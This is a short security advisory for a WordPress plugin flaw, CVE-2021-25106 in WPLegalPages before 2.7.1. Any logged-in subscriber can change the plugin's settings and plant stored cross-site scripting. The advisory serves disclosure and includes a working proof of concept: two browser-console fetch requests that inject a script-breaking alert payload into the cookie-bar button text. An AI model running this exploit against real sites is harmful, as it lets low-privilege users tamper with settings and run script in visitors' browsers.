WPLegalPages < 2.7.1 – Subscriber+ Arbitrary Settings Update to Stored XSS | CVE 2021-25106

Description

The plugin does not check for authorisation and has a flawed CSRF logic when saving its settings, allowing any authenticated users, such as subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, it could lead to Stored Cross-Site Scripting

Proof of Concept

Run the below command in the web developer console of the web browser when being authenticated as any user

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"lp_save_admin_settings", "lp-cookie-bar": "ON"}),
  "method": "POST",
  "credentials": "include"
});fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//"}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered in all frontend pages